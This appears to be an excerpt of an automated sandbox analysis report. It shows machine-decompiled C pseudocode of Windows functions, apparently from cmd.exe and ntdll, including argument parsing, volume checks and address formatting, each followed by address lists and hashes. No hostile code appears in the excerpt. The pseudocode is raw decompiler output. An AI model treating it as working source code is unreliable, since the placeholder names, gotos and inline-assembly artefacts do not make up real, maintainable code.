                                0x4a567156
                                0x4a567157
                                0x4a567157
                                0x4a567160
                                0x00000000
                                0x4a567160
                                0x4a5542f4
                                0x4a5542f4
                                0x00000000
                                0x4a5542f4
                                0x00000000
                                0x4a5554cf
                                0x4a5542bb
                                0x4a55660b
                                0x4a55660b
                                0x00000000

                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcschr
                                • String ID: :.\$=,;$=,;+/[] "
                                • API String ID: 1497570035-843887632
                                • Opcode ID: b24943746bcd3f6d00a0baadc9498e15e1d8b60a03c53ed27e86693a5018cb76
                                • Instruction ID: 836e7924650c43907edf3ab1d81443a4567b80e9f66dd75ea27adda3ac281c36
                                • Opcode Fuzzy Hash: b24943746bcd3f6d00a0baadc9498e15e1d8b60a03c53ed27e86693a5018cb76
                                • Instruction Fuzzy Hash: B6715730805369AADF20CB64CB887DA7BB5AF45314F0242DBD459A75AED7309A84CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A551F90, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A551F90(signed short* _a4, signed char* _a8) {
				signed short _t25;
				signed int _t28;
				signed char _t29;
				signed int _t30;
				signed int _t32;
				void* _t34;
				signed int _t35;
				signed short* _t38;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				signed short _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed char _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				signed short _t55;
				signed int _t63;
				signed short* _t64;
				signed char* _t66;
				intOrPtr _t67;

				_t25 = E4A551E26();
				_t64 = _a4;
				_t66 = _a8;
				 *_t64 = _t25;
				_t67 =  *0x4a590650; // 0x0
				if(_t67 != 0) {
					__eflags =  *_t66 & 0x00000040;
					 *0x4a590650 = 0;
					if(( *_t66 & 0x00000040) != 0) {
						L10:
						return 0;
					}
					 *_t64 = E4A551E26();
				}
				_t55 =  *_t64 & 0x0000ffff;
				_t28 = _t55 & 0x0000ffff;
				_t63 = 2;
				if(_t28 <= 0x29) {
					if(__eflags == 0) {
						L22:
						_t29 =  *_t66;
						__eflags = _t29 & 0x00000022;
						if((_t29 & 0x00000022) != 0) {
							L6:
							_t30 =  *_t64 & 0x0000ffff;
							if(_t30 == 0x5e) {
								__eflags =  *_t66 & 0x00000022;
								if(( *_t66 & 0x00000022) != 0) {
									goto L7;
								}
								_t42 = E4A551E26();
								 *_t64 = _t42;
								__eflags = _t42 - 0xa;
								if(_t42 != 0xa) {
									goto L10;
								}
								_t43 = E4A551E26();
								 *_t64 = _t43;
								__eflags = _t43;
								L38:
								if(__eflags == 0) {
									L17:
									return 0x100;
								}
								goto L10;
							}
							L7:
							if(_t30 == 0x22) {
								 *_t66 =  *_t66 ^ _t63;
							}
							if(( *_t66 & 0x00000023) == 0) {
								_t32 = iswspace( *_t64 & 0x0000ffff);
								__eflags = _t32;
								if(_t32 != 0) {
									goto L17;
								}
								__eflags =  *_t66 & 0x00000004;
								_t34 = 0x4a574672;
								if(( *_t66 & 0x00000004) == 0) {
									_t34 = 0x4a574670;
								}
								_t35 = E4A5518EB(_t34,  *_t64 & 0x0000ffff);
								__eflags = _t35;
								if(_t35 == 0) {
									goto L9;
								}
								goto L17;
							} else {
								L9:
								if(iswdigit( *_t64 & 0x0000ffff) != 0) {
									_t38 =  *0x4a574194; // 0x0
									__eflags = (_t38 - 0x4a58c642 & 0xfffffffe) - 4;
									if((_t38 - 0x4a58c642 & 0xfffffffe) < 4) {
										L35:
										_t39 =  *_t38 & 0x0000ffff;
										__eflags = _t39 - 0x3c;
										if(_t39 == 0x3c) {
											L37:
											__eflags =  *_t66 & 0x00000022;
											goto L38;
										}
										__eflags = _t39 - 0x3e;
										if(_t39 != 0x3e) {
											goto L10;
										}
										goto L37;
									}
									_t65 =  *(_t38 - 4) & 0x0000ffff;
									_t40 = iswspace( *(_t38 - 4) & 0x0000ffff);
									__eflags = _t40;
									if(_t40 != 0) {
										L34:
										_t38 =  *0x4a574194; // 0x0
										goto L35;
									}
									_t41 = E4A5518EB(L"()|&=,;\"", _t65);
									__eflags = _t41;
									if(_t41 == 0) {
										goto L10;
									}
									goto L34;
								}
								goto L10;
							}
						}
						__eflags = _t29 & 0x00000010;
						if((_t29 & 0x00000010) != 0) {
							L15:
							 *_t66 =  *_t66 & 0xffffffdd;
							__eflags =  *_t66;
							L16:
							__eflags =  *_t66 & 0x00000022;
							if(( *_t66 & 0x00000022) != 0) {
								goto L6;
							}
							goto L17;
						}
						__eflags = _t55 - 0x29;
						if(_t55 != 0x29) {
							goto L15;
						}
						goto L6;
					}
					_t44 = _t28;
					__eflags = _t44;
					if(_t44 == 0) {
						goto L15;
					}
					_t45 = _t44 - 0xa;
					__eflags = _t45;
					if(_t45 != 0) {
						_t46 = _t45 - 0x1c;
						__eflags = _t46;
						if(_t46 == 0) {
							goto L16;
						}
						__eflags = _t46 != _t63;
						if(_t46 != _t63) {
							goto L6;
						}
						L20:
						_t48 =  *_t66;
						__eflags = _t48 & 0x00000022;
						if((_t48 & 0x00000022) != 0) {
							goto L6;
						}
						__eflags = _t48 & 0x00000008;
						if((_t48 & 0x00000008) == 0) {
							goto L6;
						}
						goto L22;
					}
					goto L15;
				}
				_t49 = _t28 - 0x3c;
				if(_t49 == 0) {
					goto L16;
				}
				_t50 = _t49 - _t63;
				if(_t50 == 0) {
					goto L16;
				}
				_t51 = _t50 - _t63;
				if(_t51 == 0) {
					__eflags =  *_t66 & 0x00000022;
					if(( *_t66 & 0x00000022) != 0) {
						goto L6;
					}
					__eflags =  *0x4a574198; // 0x0
					if(__eflags != 0) {
						goto L20;
					}
					goto L10;
				}
				if(_t51 == 0x3c) {
					goto L16;
				}
				goto L6;
			}




























                                0x4a551f98
                                0x4a551f9d
                                0x4a551fa0
                                0x4a551fa5
                                0x4a551fa8
                                0x4a551fae
                                0x4a566f9b
                                0x4a566f9e
                                0x4a566fa4
                                0x4a552011
                                0x00000000
                                0x4a552011
                                0x4a566faf
                                0x4a566faf
                                0x4a551fb4
                                0x4a551fb7
                                0x4a551fbf
                                0x4a551fc0
                                0x4a55201a
                                0x4a5525df
                                0x4a5525df
                                0x4a5525e1
                                0x4a5525e3
                                0x4a551fd8
                                0x4a551fd8
                                0x4a551fdf
                                0x4a55fdf9
                                0x4a55fdfc
                                0x00000000
                                0x00000000
                                0x4a55fe02
                                0x4a55fe07
                                0x4a55fe0a
                                0x4a55fe0e
                                0x00000000
                                0x00000000
                                0x4a566fb7
                                0x4a566fbc
                                0x4a566fbf
                                0x4a552c09
                                0x4a552c09
                                0x4a552035
                                0x00000000
                                0x4a552035
                                0x00000000
                                0x4a552c0f
                                0x4a551fe5
                                0x4a551fe9
                                0x4a553b6b
                                0x4a553b6b
                                0x4a551ff8
                                0x4a552734
                                0x4a552737
                                0x4a552739
                                0x00000000
                                0x00000000
                                0x4a55273f
                                0x4a552742
                                0x4a552747
                                0x4a552749
                                0x4a552749
                                0x4a552753
                                0x4a552758
                                0x4a55275a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a551ffe
                                0x4a551ffe
                                0x4a55200b
                                0x4a552bba
                                0x4a552bca
                                0x4a552bcd
                                0x4a552bf3
                                0x4a552bf3
                                0x4a552bf6
                                0x4a552bfa
                                0x4a552c06
                                0x4a552c06
                                0x00000000
                                0x4a552c06
                                0x4a552bfc
                                0x4a552c00
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a552c00
                                0x4a552bcf
                                0x4a552bd4
                                0x4a552bd7
                                0x4a552bd9
                                0x4a552bee
                                0x4a552bee
                                0x00000000
                                0x4a552bee
                                0x4a552be1
                                0x4a552be6
                                0x4a552be8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a552be8
                                0x00000000
                                0x4a55200b
                                0x4a551ff8
                                0x4a5525e9
                                0x4a5525eb
                                0x4a55202d
                                0x4a55202d
                                0x4a55202d
                                0x4a552030
                                0x4a552030
                                0x4a552033
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a552033
                                0x4a5525f1
                                0x4a5525f5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5525fb
                                0x4a552020
                                0x4a552020
                                0x4a552022
                                0x00000000
                                0x00000000
                                0x4a552024
                                0x4a552024
                                0x4a552027
                                0x4a5525bc
                                0x4a5525bc
                                0x4a5525bf
                                0x00000000
                                0x00000000
                                0x4a5525c5
                                0x4a5525c7
                                0x00000000
                                0x00000000
                                0x4a5525cd
                                0x4a5525cd
                                0x4a5525cf
                                0x4a5525d1
                                0x00000000
                                0x00000000
                                0x4a5525d7
                                0x4a5525d9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5525d9
                                0x00000000
                                0x4a552027
                                0x4a551fc2
                                0x4a551fc5
                                0x00000000
                                0x00000000
                                0x4a551fc7
                                0x4a551fc9
                                0x00000000
                                0x00000000
                                0x4a551fcb
                                0x4a551fcd
                                0x4a55558a
                                0x4a55558d
                                0x00000000
                                0x00000000
                                0x4a555593
                                0x4a555599
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a55559f
                                0x4a551fd6
                                0x00000000
                                0x00000000
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: iswspace$iswdigit
                                • String ID: ()|&=,;"$=,;
                                • API String ID: 2398571481-3440842346
                                • Opcode ID: 3d6c7ff60c732f8e6822fd1682b012b0f518a612f80cd0616a8091a1f9f0b723
                                • Instruction ID: 256d2221fd17c359a9a8b76f9ee24c3970939ffca05792efddf71a691b418ca6
                                • Opcode Fuzzy Hash: 3d6c7ff60c732f8e6822fd1682b012b0f518a612f80cd0616a8091a1f9f0b723
                                • Instruction Fuzzy Hash: D5412364007243A6E7203EAAEB5073D7FE4AF56368F22051BEC80DF4ADF3248481C321
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A562ECA, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                Download Yara Rule
                                C-Code - Quality: 76%
                                			E4A562ECA(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				short _v530;
				short _v532;
				char _v1052;
				short _v1576;
				char _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				long _v2100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr* _t35;
				void* _t42;
				intOrPtr _t66;
				unsigned int _t73;
				void* _t75;
				signed int _t78;

				_t29 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t29 ^ _t78;
				_v2092 = _a4;
				E4A55185A( &_v1052, 0x104, _a8);
				_t35 =  &_v1052;
				_t75 = _t35 + 2;
				do {
					_t66 =  *_t35;
					_t35 = _t35 + 2;
				} while (_t66 != 0);
				_t77 = 0x106;
				if(E4A55A2C1(_t75,  &_v1052, (_t35 - _t75 >> 1) + 1,  &_v532, 0x106) == 0) {
					L14:
					_t42 = 0;
				} else {
					E4A5520A9(0x106,  &_v532, 0x106, E4A552EC8);
					if(GetVolumeInformationW( &_v532,  &_v1576, 0x104,  &_v2100, 0, 0, 0, 0) == 0) {
						_t77 = GetLastError;
						if(GetLastError() == 0x90) {
							goto L14;
						} else {
							_push(0);
							_push(GetLastError());
							E4A556D44( &_v532);
							_t42 = 1;
						}
					} else {
						if(_v532 == 0x5c) {
							 *((short*)(E4A552ED1( &_v532))) = 0;
						} else {
							_v530 = 0;
						}
						if(_v1576 != 0) {
							_push( &_v1576);
							_t42 = E4A56301F(_t75, _v2092, 0x235f, 2,  &_v532);
						} else {
							_t42 = E4A56301F(_t75, _v2092, 0x235e, 1,  &_v532);
						}
						if(_t42 == 0) {
							_t73 = _v2100;
							if(_t73 == 0) {
								if(_v2096 != 0) {
									goto L10;
								} else {
								}
							} else {
								L10:
								_push(_t73 & 0x0000ffff);
								E4A55179D( &_v2088, 0x100, L"%04X-%04X", _t73 >> 0x10);
								_t42 = E4A56301F(_t75, _v2092, 0x235b, 1,  &_v2088);
							}
						}
					}
				}
				return E4A5513A9(_t42, 0, _v8 ^ _t78, _t75, 0x104, _t77);
			}






















                                0x4a562ed5
                                0x4a562edc
                                0x4a562ee5
                                0x4a562efc
                                0x4a562f01
                                0x4a562f07
                                0x4a562f0c
                                0x4a562f0c
                                0x4a562f10
                                0x4a562f11
                                0x4a562f1a
                                0x4a562f37
                                0x4a56aaa8
                                0x4a56aaa8
                                0x4a562f3d
                                0x4a562f4a
                                0x4a562f71
                                0x4a56aaaf
                                0x4a56aabc
                                0x00000000
                                0x4a56aabe
                                0x4a56aabe
                                0x4a56aac1
                                0x4a56aac2
                                0x4a56aacb
                                0x4a56aacb
                                0x4a562f77
                                0x4a562f7f
                                0x4a56aadf
                                0x4a562f85
                                0x4a562f87
                                0x4a562f87
                                0x4a562f95
                                0x4a56aaed
                                0x4a56ab02
                                0x4a562f9b
                                0x4a562faf
                                0x4a562fb4
                                0x4a562fb9
                                0x4a562fbb
                                0x4a562fc3
                                0x4a563016
                                0x00000000
                                0x00000000
                                0x4a563018
                                0x4a562fc5
                                0x4a562fc5
                                0x4a562fc8
                                0x4a562fde
                                0x4a562ff7
                                0x4a562ffc
                                0x4a562fc3
                                0x4a562fb9
                                0x4a562f71
                                0x4a56300d

                                APIs
                                • GetVolumeInformationW.KERNEL32 ref: 4A562F69
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InformationVolume
                                • String ID: %04X-%04X$\
                                • API String ID: 2039140958-3612930356
                                • Opcode ID: 2f3c8073640f96bdc2c21f85ccd7e185ec0c4fef6e881647bcab95b7a840ec80
                                • Instruction ID: f7e7afc8775f35ad587e8b0a6dfe34387b87740198ef7ca4600b45cceb36ec15
                                • Opcode Fuzzy Hash: 2f3c8073640f96bdc2c21f85ccd7e185ec0c4fef6e881647bcab95b7a840ec80
                                • Instruction Fuzzy Hash: C641897290011DAADB50EA64CE85EEEB7FCEF48310F4044A6E649EB045DA709BC5CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A56C9D2, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON
                                Download Yara Rule
                                C-Code - Quality: 82%
                                			E4A56C9D2(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				intOrPtr* _t18;
				short* _t19;
				intOrPtr* _t20;
				intOrPtr* _t24;
				signed int _t26;
				signed int _t27;
				signed int _t30;
				intOrPtr* _t31;
				signed int _t33;
				signed int _t40;
				intOrPtr _t43;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t50;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t56;
				void* _t58;

				_t52 =  *0x4a5741c4; // 0x0
				if(_t52 != 0) {
					_t18 = E4A5519D6(E4A552B0D(_a4, 0));
					_t55 = _t18;
					_v12 = _t55;
					if(_t55 != 0) {
						_t19 = E4A552148(_t55, 0x20);
						if(_t19 != 0) {
							 *_t19 = 0;
						}
						_t20 = _t55;
						_t3 = _t20 + 2; // 0x2
						_t48 = _t3;
						do {
							_t43 =  *_t20;
							_t20 = _t20 + 2;
						} while (_t43 != 0);
						_t40 = _t20 - _t48 >> 1;
						_t24 = _t52;
						_v8 = 1;
						_t5 = _t24 + 2; // 0x2
						_t44 = _t5;
						do {
							_t49 =  *_t24;
							_t24 = _t24 + 2;
						} while (_t49 != 0);
						_t26 = _t24 - _t44;
						_t27 = _t26 >> 1;
						_t56 = _t27;
						if(_t26 == 0) {
							L19:
							E4A556D44(_t44, 0x400023a9, 1, _a4);
							L20:
							E4A55142E(_v12);
							_t30 = _v8;
							L21:
							L22:
							return _t30;
						}
						while( *0x4a5741b4 == 0) {
							if(_t56 >= _t40) {
								__imp___wcsnicmp(_t52, _v12, _t40);
								_t58 = _t58 + 0xc;
								if(_t27 == 0) {
									E4A5558F3(L"%s\r\n", _t52);
									_v8 = _v8 & 0x00000000;
								}
							}
							_t52 = _t52 + 2 + _t56 * 2;
							_t31 = _t52;
							_t50 = _t31 + 2;
							do {
								_t44 =  *_t31;
								_t31 = _t31 + 2;
							} while (_t44 != 0);
							_t33 = _t31 - _t50;
							_t27 = _t33 >> 1;
							_t56 = _t27;
							if(_t33 != 0) {
								continue;
							}
							break;
						}
						if(_v8 == 0) {
							goto L20;
						}
						goto L19;
					}
					_t30 = _t18 + 1;
					goto L21;
				}
				_push("Null environment");
				fprintf(__imp___iob + 0x40, "\nCMD Internal Error %s\n");
				_t30 = 1;
				goto L22;
			}
























                                0x4a56c9da
                                0x4a56c9e2
                                0x4a56ca14
                                0x4a56ca19
                                0x4a56ca1b
                                0x4a56ca20
                                0x4a56ca2b
                                0x4a56ca32
                                0x4a56ca36
                                0x4a56ca36
                                0x4a56ca39
                                0x4a56ca3b
                                0x4a56ca3b
                                0x4a56ca3e
                                0x4a56ca3e
                                0x4a56ca42
                                0x4a56ca43
                                0x4a56ca4d
                                0x4a56ca4f
                                0x4a56ca51
                                0x4a56ca58
                                0x4a56ca58
                                0x4a56ca5b
                                0x4a56ca5b
                                0x4a56ca5f
                                0x4a56ca60
                                0x4a56ca65
                                0x4a56ca67
                                0x4a56ca69
                                0x4a56ca6b
                                0x4a56cabe
                                0x4a56cac8
                                0x4a56cad0
                                0x4a56cad3
                                0x4a56cad8
                                0x4a56cadc
                                0x4a56cadd
                                0x4a56cadf
                                0x4a56cadf
                                0x4a56ca6d
                                0x4a56ca78
                                0x4a56ca7f
                                0x4a56ca85
                                0x4a56ca8a
                                0x4a56ca92
                                0x4a56ca97
                                0x4a56ca9c
                                0x4a56ca8a
                                0x4a56ca9d
                                0x4a56caa1
                                0x4a56caa3
                                0x4a56caa6
                                0x4a56caa6
                                0x4a56caaa
                                0x4a56caab
                                0x4a56cab0
                                0x4a56cab2
                                0x4a56cab4
                                0x4a56cab6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56cab6
                                0x4a56cabc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a56cabc
                                0x4a56ca22
                                0x00000000
                                0x4a56ca22
                                0x4a56c9e9
                                0x4a56c9f7
                                0x4a56ca02
                                0x00000000

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: fprintf
                                • String ID: CMD Internal Error %s$%s$Null environment
                                • API String ID: 383729395-2781220306
                                • Opcode ID: eaf91b3c6429019d7996b8b07caad5bc2e85874f3391ddfd9e67a9f0374e34d6
                                • Instruction ID: 72b9ac757eb5e0215823d7d4c021441a393390bb28cc345b873a602a617c5c6c
                                • Opcode Fuzzy Hash: eaf91b3c6429019d7996b8b07caad5bc2e85874f3391ddfd9e67a9f0374e34d6
                                • Instruction Fuzzy Hash: FD312776901202BBD711EB58DF04F9A7FB8EF94394F154162E90AEF158EBB0DA40CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 022D14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E022D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2372088; // 0x77411b12
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E022C7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E022D13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E022C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E022C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02292340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0229E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                0x022d14c0
                                0x022d14cb
                                0x022d14d2
                                0x022d14d6
                                0x022d14da
                                0x022d14de
                                0x022d14e3
                                0x022d157a
                                0x022d157a
                                0x022d14f1
                                0x022d14f3
                                0x022fea0f
                                0x00000000
                                0x022fea15
                                0x00000000
                                0x022fea15
                                0x022d14f9
                                0x022d14f9
                                0x022d14fe
                                0x022d1504
                                0x022fea1a
                                0x022fea1f
                                0x022fea21
                                0x022fea22
                                0x022fea27
                                0x022fea2a
                                0x022fea2a
                                0x022d1515
                                0x022d1517
                                0x022d156d
                                0x022d1572
                                0x022d1575
                                0x022d1575
                                0x022d151e
                                0x022fea50
                                0x022fea55
                                0x022fea58
                                0x022fea58
                                0x022d152e
                                0x022d1531
                                0x022d1533
                                0x00000000
                                0x022d1535
                                0x022d1541
                                0x022d1549
                                0x022d1549
                                0x022d1533
                                0x022d14f3
                                0x022d1559

                                APIs
                                • ___swprintf_l.LIBCMT ref: 022FEA22
                                  • Part of subcall function 022D13CB: ___swprintf_l.LIBCMT ref: 022D146B
                                  • Part of subcall function 022D13CB: ___swprintf_l.LIBCMT ref: 022D1490
                                • ___swprintf_l.LIBCMT ref: 022D156D
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u
                                • API String ID: 48624451-3050659472
                                • Opcode ID: bff4ef8a634bcad89900239796985618bdd37526bafb0e84fb2949ef893005ae
                                • Instruction ID: 1855a342304dc43a5b1d4f153c8ddfedd3acef314438a864cc7a9d35cadf5b9c
                                • Opcode Fuzzy Hash: bff4ef8a634bcad89900239796985618bdd37526bafb0e84fb2949ef893005ae
                                • Instruction Fuzzy Hash: D721C8729202199BDF21DED8CC40AEAB3ADAF10714F444125ED4AD3148DB79AA68CFE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02333DA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                Download Yara Rule
                                C-Code - Quality: 62%
                                			E02333DA7(void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v11;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				void* _t19;
				void* _t29;
				void* _t32;
				void* _t33;
				intOrPtr _t34;
				void* _t39;
				intOrPtr* _t40;
				void* _t42;
				signed int _t44;
				void* _t45;

				_t39 = __edx;
				_t17 =  *0x2372088; // 0x77411b12
				_v8 = _t17 ^ _t44;
				_t34 = _a16;
				_t41 = _a4;
				_t40 = _a20;
				if(_a4 == 0 || _t40 == 0 || _t34 == 0 &&  *_t40 != _t34) {
					L12:
					_t19 = 0xc000000d;
				} else {
					_t21 =  &_v76;
					if(_a12 != 0) {
						_push(0x2299cbe);
						_push(0x41);
						_push( &_v76);
						_t33 = E0234894A();
						_t45 = _t45 + 0xc;
						_t21 = _t44 + _t33 - 0x48;
					}
					_t42 = E02333B8E(_t41, _t21);
					if(_a8 != 0) {
						_t32 = E0234894A(_t42,  &_v11 - _t42, "%%%u", _a8);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t32;
					}
					if(_a12 != 0) {
						_t29 = E0234894A(_t42,  &_v11 - _t42, "]:%u", _a12 & 0x0000ffff);
						_t45 = _t45 + 0x10;
						_t42 = _t42 + _t29;
					}
					_t41 = _t42 -  &_v76 + 1;
					 *_t40 = _t41;
					if( *_t40 < _t41) {
						goto L12;
					} else {
						E02292340(_t34,  &_v76, _t41);
						_t19 = 0;
					}
				}
				return E0229E1B4(_t19, _t34, _v8 ^ _t44, _t39, _t40, _t41);
			}




















                                0x02333da7
                                0x02333daf
                                0x02333db6
                                0x02333dba
                                0x02333dbe
                                0x02333dc2
                                0x02333dc7
                                0x02333e6b
                                0x02333e6b
                                0x02333de1
                                0x02333de6
                                0x02333de9
                                0x02333deb
                                0x02333df0
                                0x02333df2
                                0x02333df3
                                0x02333df8
                                0x02333dfb
                                0x02333dfb
                                0x02333e0a
                                0x02333e0c
                                0x02333e1d
                                0x02333e22
                                0x02333e25
                                0x02333e25
                                0x02333e2c
                                0x02333e46
                                0x02333e4b
                                0x02333e4e
                                0x02333e4e
                                0x02333e55
                                0x02333e58
                                0x02333e5a
                                0x00000000
                                0x02333e5c
                                0x02333e5f
                                0x02333e67
                                0x02333e67
                                0x02333e5a
                                0x02333e7e

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2392323455.0000000002280000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true
                                • Associated: 00000009.00000002.2392311741.0000000002270000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392591356.0000000002360000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: %%%u$]:%u
                                • API String ID: 48624451-3050659472
                                • Opcode ID: 38495e9e149ff6d61f56fd80b4f6fa856ab27bd67983e82c31a038afa3e11c9b
                                • Instruction ID: 65af87e59e5e7950257f254a54546274f8da6935f13ae2db08364a836ff71bf0
                                • Opcode Fuzzy Hash: 38495e9e149ff6d61f56fd80b4f6fa856ab27bd67983e82c31a038afa3e11c9b
                                • Instruction Fuzzy Hash: 2321B0B390021AABDB21AE69CC449EF77EDDF18B18F044566FC05A7140E7749B84CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A571BCF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule
                                C-Code - Quality: 34%
                                			E4A571BCF(intOrPtr _a4) {
				signed int _v8;
				short _v528;
				short _v1048;
				long _v1052;
				void* __esi;
				signed int _t10;
				intOrPtr _t12;
				int _t14;
				void* _t15;
				signed int _t22;
				void* _t24;
				void* _t31;
				void* _t32;
				signed int _t34;

				_t10 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t10 ^ _t34;
				_t12 = _a4;
				__imp__GetVolumePathNameW(_t12,  &_v528, 0x104);
				if(_t12 != 0) {
					_t14 = GetDriveTypeW( &_v528);
					if(_t14 == 0 || _t14 == 4) {
						_t15 = 0;
					} else {
						if(GetVolumeInformationW( &_v528, 0, 0, 0,  &_v1052,  &_v1052,  &_v1048, 0x104) == 0) {
							goto L1;
						} else {
							_t22 =  &_v1048;
							__imp___wcsicmp(_t22, L"NTFS");
							asm("sbb eax, eax");
							_t15 =  ~_t22 + 1;
						}
					}
				} else {
					L1:
					_t15 = 1;
				}
				return E4A5513A9(_t15, _t24, _v8 ^ _t34, _t31, _t32, 0x104);
			}

















                                0x4a571bda
                                0x4a571be1
                                0x4a571be4
                                0x4a571bf6
                                0x4a571bfe
                                0x4a571c0c
                                0x4a571c16
                                0x4a571c5c
                                0x4a571c1d
                                0x4a571c3f
                                0x00000000
                                0x4a571c41
                                0x4a571c41
                                0x4a571c4d
                                0x4a571c56
                                0x4a571c59
                                0x4a571c59
                                0x4a571c3f
                                0x4a571c00
                                0x4a571c00
                                0x4a571c02
                                0x4a571c02
                                0x4a571c6a

